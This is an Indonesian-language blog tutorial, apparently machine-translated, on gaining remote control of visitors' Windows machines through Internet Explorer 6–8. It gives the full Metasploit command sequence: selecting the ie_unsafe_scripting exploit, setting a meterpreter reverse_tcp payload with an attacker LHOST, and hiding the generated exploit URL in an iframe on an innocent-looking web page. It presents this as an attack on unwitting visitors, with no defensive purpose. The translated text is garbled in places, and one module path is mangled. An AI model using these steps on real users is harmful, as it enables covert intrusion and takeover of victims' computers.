Ini
adalah tutorial lengkap untuk mendapatkan akses root ketika orang
mengunjungi website Anda, di sini saya menggunakan alat Metasploit kuat
untuk masuk pengaturan backdoor. Metasploit adalah membangun Hacker Os Kali Linux, aku menyarankan Anda
untuk membaca artikel saya sebelumnya, untuk mengerti lebih banyak tentang
Kali Linux: Sebuah Pengantar Untuk OS Hacker:
Seni hacking saat ini difokuskan pada menyerang sisi klien daripada sisi server. Sistem
operasi server menjadi lebih aman, sementara klien yang sarat dengan
perangkat lunak yang tidak aman yang dapat dengan mudah dieksploitasi. Jadi, seperti yang Anda harapkan, hacks terbaik sekarang datang pada software sisi klien. jadi di sini aku menjelajahi hack sisi klien.Hacking IE8 untuk Akses RootDalam hack ini, kita akan memanfaatkan Microsoft Internet Explorer 6,
7, dan 8 onWindows XP, Vista, Windows 7 atau Windows Server 2003 dan
2008.Ketika
Windows 7 dan Windows Server 2008 yang dirilis, browser default adalah
IE8, Dalam contoh kita, kita akan menggunakan IE 8 pada Windows Vista,
tetapi akan bekerja pada salah satu sistem operasi yang tercantum di
atas dengan Internet Explorer 8.1 atau sebelumnya di atasnya.Jadi, mari kita mulai. Jalankan Metasploit Anda di Kali Linux (Pengantar menggunakan Metasploit)
Langkah 1:~ Cari Tepat ExploitMari
kita menemukan yang tepat mengeksploitasi dengan mencari Metasploit
untuk Windows memanfaatkan yang mengambil keuntungan dari scripting
tidak aman. Jenis:
msf> search type:exploit platform:windows unsafe
Seperti yang Anda lihat dari gambar di bawah, pencarian ini membawa 15 eksploitasi. Yang kita inginkan adalah / exploit / windows / browser / ie_unsafe_scripting.
Langkah 2:~ Pilih ini ExploitSelanjutnya memberitahu Metasploit bahwa ini adalah mengeksploitasi kita ingin menggunakan. Ketik
msf> use /exploit/windows/browser/i.e._unsafe_scripting
Langkah 3:~ Pilih Payload yangKemudian beban muatan, dalam hal ini, windows / meterpreter / reverse_tcp:msf> set PAYLOAD windows/meterpreter/reverse_tcp
Langkah 4:~ Periksa Pilihan DiperlukanSelanjutnya, mari kita periksa untuk melihat apa pilihan ini mengeksploitasi membutuhkan:msf> Show
Kita
bisa melihat dari output yang ditampilkan di atas bahwa payload
mengharuskan kita untuk mengatur host lokal (LHOST), atau dengan kata
lain, alamat IP dari mesin kami. Dalam kasus saya, itu 192.168.1.100.
Langkah 5:~ Mengatur host lokalKita perlu memberitahu Metasploit apa host lokal (LHOST) alamat IP kita. Jenis:
msf> set LHOST 192.168.1.100
Karena ini adalah sisi klien mengeksploitasi, kita tidak perlu
mengatur RHOST seperti yang kita perlu secara manual menyerang sistem
dengan mengajak mereka untuk mengklik link berbahaya kami.
Langkah 6:~Jalankan ExploitSekarang, mari kita jalankan mengeksploitasi. Jenis:
msf> exploit (ie_unsafe_scripting) > exploit
Seperti
yang Anda lihat pada gambar di bawah, ini mengeksploitasi telah
menghasilkan link (http://192.168.1.100:8080/HG6Kn71Nva) bahwa kita
harus mendapatkan target kami untuk memuat sehingga kita dapat
memanfaatkan browser mereka. Untuk melakukan hal ini, kita akan menambahkan sedikit HTML ke halaman web yang tidak bersalah mencari.
Langkah 7:~Tambahkan URL ke <IFRAME> Tag Untuk mendapatkan peramban target Anda untuk memuat URL Anda, Anda dapat mengirimkannya kepada mereka secara langsung, atau
menanamkan dalam iframe di website . Untuk melakukannya, tambahkan tag berikut ke html Anda di mana saja di dalam <body> Elemen:<Iframe src = "http://192.168.1.100:8080/HG6Kn71Nva"> </ iframe>Ketika korban mencoba untuk memuat halaman, tidak ada yang akan ditampilkan. Browser akan menggantung, tapi kami akan memiliki aktivitas di msfconsole kami. Ketika korban menavigasi ke link itu akan membuka sesi meterpreter aktif yang kita terhubung ke. We now own this box!
Thankyou.
Title : Cara Dapatkan Akses Root Di Web - Pemanfaatan IE8
Description : Ini adalah tutorial lengkap untuk mendapatkan akses root ketika orang mengunjungi website Anda, di sini saya menggunakan alat M...